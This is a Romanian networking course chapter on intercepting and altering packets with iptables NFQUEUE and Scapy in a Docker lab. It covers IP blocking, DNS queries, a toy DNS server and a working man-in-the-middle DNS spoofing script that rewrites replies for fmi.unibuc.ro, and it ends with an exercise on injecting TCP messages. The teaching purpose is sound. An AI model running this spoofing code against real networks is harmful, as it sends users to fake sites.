computer-networks

Capitolul 6 - Packet Manipulation

Cuprins

Introducere

Important: continuăm cu aceeași configurație ca în capitolul3 și urmărim secțiunea introductivă de acolo.

cd computer-networks

# ștergem toate containerele create default
docker compose down

# ștergem rețelele create anterior ca să nu se suprapună cu noile subnets
docker network prune

# lucrăm cu docker compose.yml din capitolul3
cd capitolul3
docker compose up -d

# sau din directorul computer-networks: 
# docker compose -f capitolul3/docker compose.yml up -d

Netfilter Queue

Pentru a modifica pachetele care circulă live pe rețeaua noastră, putem folosi librăria NetfilterQueue care stochează pachetele într-o coadă. La citirea din coadă, pachetele pot fi acceptate (packet.accept()) pentru a fi transmise mai departe sau pot fi blocate (packet.drop()). În cazul în care dorim să le alterăm în timp real, putem folosi șiruri de octeți pentru a seta payload: packet.set_payload(bytes(scapy_packet)), unde payload reprezintă întregul pachet sub formă binară. Mai multe exemple puteți găsi în extensia de python. Pentru a folosi librăria, trebuie să adăugăm o regulă în firewall-ul iptables prin care să redirecționăm toate pachetele către o coadă NFQUEUE cu un id specific. Acest lucru se poate face din shell:

# toate pachetele de la input se redirectioneaza catre coada 5
iptables -I INPUT -j NFQUEUE --queue-num 5
# toate pachetele spre output
iptables -I OUTPUT -j NFQUEUE --queue-num 5
# toate pachetele care sunt forwardate
iptables -I FORWARD -j NFQUEUE --queue-num 5


# stergem regula prin
iptables -D FORWARD 1

sau din python:

import os
os.system("iptables -I INPUT -j NFQUEUE --queue-num 5")

Intercepting Packets

Setăm regula de iptables în funcție de locația de unde interceptăm pachete, dacă suntem pe aceiași mașină, rulăm redirecționarea pachetelor de la INPUT sau OUTPUT iar dacă suntem pe container router sau middle care au ca scop forwardarea pachetelor, folosim regula de FORWARD.

from scapy.all import *
from netfilterqueue import NetfilterQueue as NFQ
import os

Construim o funcție care modifică layer-ul de IP dintr-un pachet și setează tos = 3. Pentru end-points care au ECN enabled, acest număr setează biții de congestionare pe 11 care indică faptul că există o congestionare a rețelei.

def alter_packet(pachet):
  '''Implementați asta ca exercițiu.
  # !atentie, trebuie re-calculate campurile len si checksum
  '''
  if pachet.haslayer(IP):    
    del pachet[IP].chksum
    del pachet[IP].len
    # pentru a obtine din nou len si chksum, facem rebuild
    # se face automat, de catre scapy
    # pachet = IP(pachet.build())
  return pachet

Construim o funcție care va fi apelată pentru fiecare pachet din coada NFQUEUE. În cadrul acestei funcții se apelează alter_packet care are ca scop modificarea conținutului pachetului în tranzit.

def proceseaza(pachet):
  octeti = pachet.get_payload()
  scapy_packet = IP(octeti)
  print("Pachet inainte: ")
  scapy_packet.show()
  scapy_packet = alter_packet(scapy_packet)
  print("Pachet dupa: ")
  scapy_packet.show()
  pachet.set_payload(bytes(scapy_packet))
  pachet.accept()

Executăm comanda de iptables si bucla infită pe NFQUEUE.

queue = NFQ()
try:
  os.system("iptables -I FORWARD -j NFQUEUE --queue-num 5")
  queue.bind(5, proceseaza)
  queue.run()
except KeyboardInterrupt:
  queue.unbind()

Blocarea unui IP

Ne atașăm containerului router:

docker compose exec router bash

Dintr-un terminal de python sau dintr-un fișier rulăm:

from scapy.all import *
from netfilterqueue import NetfilterQueue as NFQ
import os
def proceseaza(pachet):
  # octeti raw, ca dintr-un raw socket
  octeti = pachet.get_payload()
  # convertim octetii in pachet scapy
  scapy_packet = IP(octeti)
  scapy_packet.summary()
  if scapy_packet[IP].src == '198.10.0.2':
    print("Drop la: ", scapy_packet.summary())
    pachet.drop()
  else:
    print("Accept la: ", scapy_packet.summary())
    pachet.accept()

queue = NFQ()
try:
  os.system("iptables -I INPUT -j NFQUEUE --queue-num 5")
  # bind trebuie să folosească aceiași coadă ca cea definită în iptables
  queue.bind(5, proceseaza)
  queue.run()
except KeyboardInterrupt:
  queue.unbind()

Într-un alt terminal ne atașăm containerului server:

docker compose exec server bash
# nu va mai merge
ping router 

Exemple de protocoale în Scapy

Dynamic Host Configuration Protocol si BOOTP

Domain Name System

DNS este un protocol la nivelul aplicației care este standardizat pentru UDP, port 53. Acesta se bazează pe request-response iar în cazul în care nu se primesc răspunsuri după un număr de reîncercări (de multe ori 2), programul anunță că nu poate găsi IP-ul pentru hostname-ul cerut (“can’t resolve”). Headerul protocolului este definit aici.

Exemplu DNS request

from scapy.all import *

# DNS request către google DNS
ip = IP(dst = '8.8.8.8')
transport = UDP(dport = 53)

# rd = 1 cod de request
dns = DNS(rd = 1)

# query pentru a afla entry de tipul 
dns_query = DNSQR(qname=b'fmi.unibuc.ro.', qtype=1, qclass=1)
dns.qd = dns_query

answer = sr1(ip / transport / dns)
print (answer[DNS].summary())

Micro DNS Server

Putem scrie un mic exemplu de aplicație care să funcționeze ca DNS care returnează DNS A records. DNS rulează ca UDP pe portul 53:

simple_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, proto=socket.IPPROTO_UDP)
simple_udp.bind(('0.0.0.0', 53))

while True:
  request, adresa_sursa = simple_udp.recvfrom(65535)
  # converitm payload-ul in pachet scapy
  packet = DNS(request)
  dns = packet.getlayer(DNS)
  if dns is not None and dns.opcode == 0: # dns QUERY
    print ("got: ")
    print (packet.summary())
    dns_answer = DNSRR(   # DNS Reply
      rrname=dns.qd.qname, # for question
      ttl=330,       # DNS entry Time to Live
      type="A",      
      rclass="IN",
      rdata='1.1.1.1')   # found at IP: 1.1.1.1 :)
    dns_response = DNS(
             id = packet[DNS].id, # DNS replies must have the same ID as requests
             qr = 1,       # 1 for response, 0 for query 
             aa = 0,       # Authoritative Answer
             rcode = 0,      # 0, nicio eroare http://www.networksorcery.com/enp/protocol/dns.htm#Rcode,%20Return%20code
             qd = packet.qd,   # request-ul original
             an = dns_answer)   # obiectul de reply
    print('response:')
    print (dns_response.summary())
    simple_udp.sendto(bytes(dns_response), adresa_sursa)
simple_udp.close()

Testați-l cu

dig @localhost fmi.unibuc.ro

DNS Spoofing

Dacă intermediem conexiunea între două noduri, putem insera răspunsuri DNS malițioase cu scopul de a determina userii să acceseze pagini false. Pe linux, un DNS customizabil se poate set prin fișierul /etc/resolv.conf sau ca în exemplul de aici).

Presupunem că folosim configurația de containere definită în acest capitol, că ne aflăm pe containerul router și că monitorizăm toate cererile containerul server. În cazul în care observăm un pachet UDP cu portul destinație 53 (e.g., IP destinație 8.8.8.8), putem încerca să trimitem un reply care să pară că vine de la DNS (8.8.8.8) cu o adresă IP falsă care nu apraține numelui interogat de către server. E posibil ca reply-ul nostru să ajungă la containerul server, dar și reply-ul serverul DNS original (8.8.8.8) să ajungă tot la container. Pentru ca atacul să fie cât mai lin, cel mai sigur este să modificăm live răspunsurile DNS-ului original (8.8.8.8) după următoarele instrucțiuni (sursa originală):

1. iptables forward către nfqueue

Ne atașăm containerului router pentru a ataca containerul server. Construim o regulă de iptables prin care toate pachetele care trebuie forwardate (-I FORWARD) să treacă prin regula NFQUEUE cu număr de identificare 10 (putem alege orice număr).

docker compose exec router bash

iptables -I FORWARD -j NFQUEUE --queue-num 10
2. Scriem o funcție care detectează și modifică pachete de tip DNS reply

Deschidem un terminal de python sau executăm python3 /elocal/capitolul3/src/examples/dns_spoofing.py:

#!/usr/bin/env python3

from scapy.all import *
from netfilterqueue import NetfilterQueue as NFQ
import os

def detect_and_alter_packet(packet):
  """Functie care se apeleaza pentru fiecare pachet din coada
  """
  octets = packet.get_payload()
  scapy_packet = IP(octets)
  # daca pachetul are layer de IP, UDP si DNSRR (reply)
  if scapy_packet.haslayer(IP) and scapy_packet.haslayer(UDP) and scapy_packet.haslayer(DNSRR):\
    # daca e site-ul fmi, apelam functia care face modificari
    if scapy_packet[DNSQR].qname == b'fmi.unibuc.ro.':
      print("[Before]:", scapy_packet.summary())
      # noul scapy_packet este modificat cu functia alter_packet
      scapy_packet = alter_packet(scapy_packet)
      print("[After ]:", scapy_packet.summary())
      # extragem octetii din pachet
      octets = bytes(scapy_packet)
      # il punem inapoi in coada modificat
      packet.set_payload(octets)
  # apelam accept pentru fiecare pachet din coada
  packet.accept()


def alter_packet(packet):
  # obtinem qname sau Question Name
  qname = packet[DNSQR].qname
  # construim un nou raspuns cu reply data
  packet[DNS].an = DNSRR(rrname=qname, rdata='1.1.1.1')
  # answer count = 1
  packet[DNS].ancount = 1
  # am modificat pachetul si stergem campurile len si checksum
  # in mod normal ar trebui recalculate, dar scapy face asta automat
  del packet[IP].len
  del packet[IP].chksum
  del packet[UDP].len
  del packet[UDP].chksum
  # returnam pachetul modificat
  return packet
3. Executăm coada Netfilter cu funcția definită anterior
queue = NFQ()
try:
  os.system("iptables -I FORWARD -j NFQUEUE --queue-num 10")
  # bind trebuie să folosească aceiași coadă ca cea definită în iptables
  queue.bind(10, detect_and_alter_packet)
  queue.run()
except KeyboardInterrupt:
  os.system("iptables --flush")
  queue.unbind()

Testați din containerul server: docker compose exec server bash -c "ping fmi.unibuc.ro"

Exerciții

 1. Urmăriți mai multe exemple din scapy aici
 2. Utilizați NetfilterQueue în containerul router pentru a intercepta pachete TCP dintre client și server și pentru a injecta mesaje suplimentare în comunicare.